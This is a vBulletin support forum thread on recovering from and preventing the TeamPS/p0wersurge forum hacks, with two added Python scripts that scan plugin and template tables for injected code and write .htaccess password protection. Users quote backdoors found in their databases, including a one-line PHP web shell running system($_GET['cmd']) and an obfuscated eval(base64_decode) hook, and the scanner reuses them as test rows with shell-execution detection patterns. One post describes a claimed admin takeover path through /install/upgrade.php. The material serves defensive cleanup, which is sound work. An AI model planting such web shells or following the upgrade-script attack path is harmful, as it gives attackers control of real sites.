Preventative - How to avoid being Hacked by TeamPS i.e. p0wersurge

  • TheLastSuperman
    commented on 's reply
    Delete the /install directory from vB4 as well; it is not required and is not needed unless it's being called by some administrative function, usually from tools.php or one of the maintenance functions, and if your site is running smoothly without errors there is usually no need to run those. If you go to do something in admincp and an error is given, then simply temporarily re-upload the install folder (minus the install.php file), do your "function", then delete it again.

  • BirdOPrey5
    replied
    That doesn't make sense, you are required to login to the admin cp with a username and password after an upgrade (if not already logged in), I just confirmed on my own test site.

    That said for VB3/4 it is good practice to password protect the install and admincp directories. In VB5 the new rule is to delete the entire install directory.



  • Inspector G
    replied
    I found a way they are doing this...

    I also saw this somewhere, I just can't remember where...
    but I removed the whole install file after, I restored my site and nothing has happened so far...

    To access vBulletin use this
    /install/upgrade.php
    All you need is a Customer Number to run the upgrade script
    Then once they upgrade...
    They can access the admin CP, then they upload
    whatever they want using XML and then they can access the rest of the sub-domains
    This isn't made aware to the public, they go on to say...
    Last edited by Inspector G; Thu 28 Feb '13, 8:24pm.



  • Zachery
    replied
    Not normal, remove that code or reupload a fresh copy.



  • meissen
    replied
    When I run the SQL query for base64 in plugins I get a long string under the subscriptions.php file... is that normal?

    if (strpos($_SERVER['PHP_SELF'],'subscriptions.php')) { eval(gzinflate(base64_decode('-removed-'))); exit; }



  • The_Rascal
    replied
    Thanks Snakes,
    New thread posted.



  • snakes1100
    replied
    Originally posted by The_Rascal:
    Thanks Zapiy.
    It is my forum that has the issues. I have attached screen dumps of the tools installed.
    Anyone know how to remove them?
    Our hosts are saying that they are not installed server side, I have downloaded and run an antivirus scan on all the ftp files (fresh, clean upload of vb 4.20) and of course that came up clean.

    Any help or assistance will be very much appreciated

    Thanks

    Rascal
    You should start your own thread.

    It's not going to be that easy; it's not just something we can say point blank, "it's here or there."

    If the files are scanned & verified as clean, either with a tool or because you have deleted all files & replaced them, including .htaccess files, then you will need to scan the DB & verify it's clean as well. I'd start by scanning the DB for iframe and exec code in your template & plugin tables.



  • The_Rascal
    replied
    Originally posted by zapiy:
    This has happened on a site I am trying to help out on. The server side has been completely replaced with new code and the vB software upgraded. The exploit is only inactive when the hooks are disabled, but no mods are currently installed?

    Could someone please help us out?

    Cheers
    Thanks Zapiy.
    It is my forum that has the issues. I have attached screen dumps of the tools installed.
    Anyone know how to remove them?
    Our hosts are saying that they are not installed server side, I have downloaded and run an antivirus scan on all the ftp files (fresh, clean upload of vb 4.20) and of course that came up clean.

    Any help or assistance will be very much appreciated

    Thanks

    Rascal


  • zapiy
    replied
    This has happened on a site I am trying to help out on. The server side has been completely replaced with new code and the vB software upgraded. The exploit is only inactive when the hooks are disabled, but no mods are currently installed?

    Could someone please help us out?

    Cheers



  • Wayne Luke
    replied
    There is a directory named vb... It is the last in a list of directories provided in my post above (admincp, modcp, install, include, packages, vb).



  • Black Snow
    replied
    What do you mean by vb directories?



  • Wayne Luke
    replied
    You should only place the .htaccess file in the admincp, modcp, install, includes, packages and vb directories.



  • Black Snow
    replied
    I ran the .htpasswd tool from the link in the first post and created a .htaccess file. Can I place the .htaccess file in every directory on my site?

    The questions I am facing now are, if I place it in every directory:

    • Will my forum still be able to run properly?
    • Will attachments still be able to be downloaded?
    • Will avatars, images etc still be able to be uploaded?
    • Will this restrict me from doing anything?


    If the answer to the above questions is no, the forum won't run properly, where is the most important place to put the .htaccess file to prevent my forum being hacked?



  • SVTOA
    replied
    I ran one of the queries suggested above and found this:

    PHP Code:
    DF
    ob_start(); system($_GET['cmd']); $execcode = ob_get_contents(); ob_end_clean();
    global_start     vbulletin
    I can't figure out where this code has been placed. Can anyone help please?

    - - - Updated - - -

    Follow-up: found a plugin "DF" and it contains this code.

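The advice that runs through this thread (snakes1100: once the files are known clean, scan the template and plugin tables for iframe and exec code; meissen's base64 query; SVTOA's "DF" plugin) as a runnable scan. This is an added example, not code from the thread or from vBulletin. It assumes the vBulletin 3/4 column names plugin.title, plugin.hookname, plugin.product, plugin.active, plugin.phpcode and template.title, template.template, and it builds an in-memory SQLite copy with constructed rows so it runs offline; two of those rows are copied from the snippets quoted in this thread (meissen's payload left as the placeholder 'REMOVED'), the iframe row and the clean rows are made up. A production vB database is MySQL, possibly with a table prefix, so the MYSQL_FIRST_PASS string is the equivalent query to run there.

```python
"""Scan vBulletin's plugin and template tables for injected code (added example)."""
import re
import sqlite3

# Indicators drawn from the backdoors quoted in this thread.  A hit is a lead
# to inspect, not proof: some legitimate add-ons do read $_GET directly.
SUSPICIOUS = [
    ("eval", re.compile(r"\beval\s*\(", re.I)),
    ("base64_decode", re.compile(r"\bbase64_decode\s*\(", re.I)),
    ("gzinflate/gzuncompress", re.compile(r"\bgz(inflate|uncompress)\s*\(", re.I)),
    ("shell exec", re.compile(r"\b(system|exec|passthru|shell_exec|popen)\s*\(", re.I)),
    ("request-controlled input", re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[", re.I)),
    ("iframe", re.compile(r"<\s*iframe\b", re.I)),
]

# First-pass query for the real MySQL database (add your table prefix if any);
# scan_db() below is the fuller check.
MYSQL_FIRST_PASS = """
SELECT pluginid, title, hookname, product, active
FROM plugin
WHERE phpcode LIKE '%base64_decode%' OR phpcode LIKE '%eval(%'
   OR phpcode LIKE '%gzinflate%'     OR phpcode LIKE '%system(%';
"""


def find_indicators(text):
    """Return the labels of every SUSPICIOUS pattern found in *text*."""
    return [label for label, rx in SUSPICIOUS if rx.search(text or "")]


def scan_db(conn):
    """Scan plugin.phpcode and template.template; return one dict per flagged row."""
    findings = []
    for pid, title, hook, product, active, code in conn.execute(
        "SELECT pluginid, title, hookname, product, active, phpcode FROM plugin"
    ):
        hits = find_indicators(code)
        if hits:
            findings.append({"table": "plugin", "id": pid, "title": title,
                             "hook": hook, "product": product, "active": active,
                             "indicators": hits})
    for tid, title, body in conn.execute(
        "SELECT templateid, title, template FROM template"
    ):
        hits = find_indicators(body)
        if hits:
            findings.append({"table": "template", "id": tid, "title": title,
                             "hook": None, "product": None, "active": None,
                             "indicators": hits})
    return findings


def build_demo_db():
    """Constructed sample data: two clean rows, three modelled on the thread's finds."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE plugin(pluginid INTEGER, title TEXT, hookname TEXT,
                            product TEXT, active INTEGER, phpcode TEXT);
        CREATE TABLE template(templateid INTEGER, title TEXT, template TEXT);
    """)
    conn.executemany("INSERT INTO plugin VALUES (?,?,?,?,?,?)", [
        (1, "Sample counter", "global_start", "vbulletin", 1,
         "$vbulletin->sample_counter = 1;"),                        # benign (constructed)
        (2, "DF", "global_start", "vbulletin", 1,                   # SVTOA's find, as quoted
         "ob_start(); system($_GET['cmd']); $execcode = ob_get_contents(); ob_end_clean();"),
        (3, "Subscriptions hook", "global_start", "vbulletin", 1,   # meissen's find, payload removed
         "if (strpos($_SERVER['PHP_SELF'],'subscriptions.php')) "
         "{ eval(gzinflate(base64_decode('REMOVED'))); exit; }"),
    ])
    conn.executemany("INSERT INTO template VALUES (?,?,?)", [
        (1, "header", '<div class="header">{vb:raw vboptions.bbtitle}</div>'),   # benign
        (2, "footer", '<div class="footer"></div>'                               # constructed
                      '<iframe src="http://example.invalid/" width="0" height="0"></iframe>'),
    ])
    return conn


if __name__ == "__main__":
    for f in scan_db(build_demo_db()):
        print(f"{f['table']}#{f['id']} {f['title']!r} hook={f['hook']} -> "
              + ", ".join(f["indicators"]))
```

Flagged rows are the ones to read in full in the plugin manager (or to remove and re-check after a clean re-upload); a plugin whose hook is global_start and whose product is "vbulletin" but which is not listed in the stock product is the shape both finds in this thread took.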


  • Ace
    replied
    Originally posted by tChristine:
    Hi TLS,

    Could you please post a specific example for admincp?

    If the output is this:

    AuthType Basic <--leave as is? - Required? [Ace: Yes.]
    AuthName "My Protected Area" <-- what path/syntax do you use here for admincp? [Ace: Whatever you like. "Sausages".]
    AuthUserFile /path/to/.htpasswd <-- so it's domain.com(or php?)/public_html/.htpasswd ? [Ace: Noooo! Not under public_html, above it.]
    Require valid-user <--leave as is? - Required? [Ace: Yes.]

    Thank you.
    My answers are marked [Ace: ...] above.

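The .htaccess Basic-auth setup that Ace answers above, Wayne Luke's list of directories to put it in (admincp, modcp, install, includes, packages, vb) and the repeated advice to delete or protect /install, combined into one script that writes the files and audits the result. This is an added example, not code from the thread or from vBulletin. It assumes Apache with mod_auth_basic reading per-directory .htaccess files, that the .htpasswd file itself is created separately with Apache's htpasswd tool, and that, as Ace stresses, it is kept above the document root; is_outside() is the check for that last point, and build_demo_tree() fabricates a throwaway directory tree so the functions can be exercised offline.

```python
"""Write Basic-auth .htaccess files onto vBulletin's sensitive directories and audit them (added example)."""
import os
import tempfile

# Directories from Wayne Luke's reply; a visitor never needs to reach any of them.
PROTECTED_DIRS = ("admincp", "modcp", "install", "includes", "packages", "vb")


def render_htaccess(auth_user_file, realm="Restricted Area"):
    """Render the four-directive .htaccess discussed in the thread."""
    return (
        "AuthType Basic\n"
        f'AuthName "{realm}"\n'
        f"AuthUserFile {auth_user_file}\n"
        "Require valid-user\n"
    )


def is_outside(path, docroot):
    """True when *path* resolves to somewhere outside *docroot*.

    realpath() collapses '..' and symlinks first, so a path written as
    /var/www/public_html/../.htpasswd is correctly judged to be outside.
    """
    p = os.path.realpath(path)
    d = os.path.realpath(docroot)
    return os.path.commonpath([p, d]) != d


def protect(vb_root, htpasswd_path, dirs=PROTECTED_DIRS):
    """Write the .htaccess into each listed directory that exists; return the names written."""
    written = []
    for name in dirs:
        target = os.path.join(vb_root, name)
        if os.path.isdir(target):
            with open(os.path.join(target, ".htaccess"), "w", encoding="ascii") as fh:
                fh.write(render_htaccess(htpasswd_path))
            written.append(name)
    return written


def audit(vb_root, docroot, htpasswd_path, dirs=PROTECTED_DIRS):
    """Return a list of human-readable problems; an empty list means the checks pass."""
    problems = []
    if not is_outside(htpasswd_path, docroot):
        problems.append(f"{htpasswd_path} is inside the document root {docroot}")
    if os.path.isdir(os.path.join(vb_root, "install")):
        problems.append("install/ is still present; delete it when not upgrading")
    for name in dirs:
        target = os.path.join(vb_root, name)
        if os.path.isdir(target) and not os.path.isfile(os.path.join(target, ".htaccess")):
            problems.append(f"{name}/ has no .htaccess")
    return problems


def build_demo_tree():
    """Constructed layout: <tmp>/public_html is both the document root and the vB root."""
    base = tempfile.mkdtemp(prefix="vbdemo-")
    docroot = os.path.join(base, "public_html")
    for name in PROTECTED_DIRS + ("images", "customavatars"):
        os.makedirs(os.path.join(docroot, name))
    return {
        "vb_root": docroot,
        "docroot": docroot,
        "good_htpasswd": os.path.join(base, ".htpasswd"),    # above public_html
        "bad_htpasswd": os.path.join(docroot, ".htpasswd"),  # inside public_html: wrong
    }


if __name__ == "__main__":
    tree = build_demo_tree()
    print("before:", audit(tree["vb_root"], tree["docroot"], tree["bad_htpasswd"]))
    protect(tree["vb_root"], tree["good_htpasswd"])
    print("after :", audit(tree["vb_root"], tree["docroot"], tree["good_htpasswd"]))
```

The audit still reports install/ after the files are written: on vB3/4 protecting it answers the thread's question, but the directory is only needed during an upgrade, so the cleaner state is to have it absent and re-upload it for the duration of the next upgrade.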
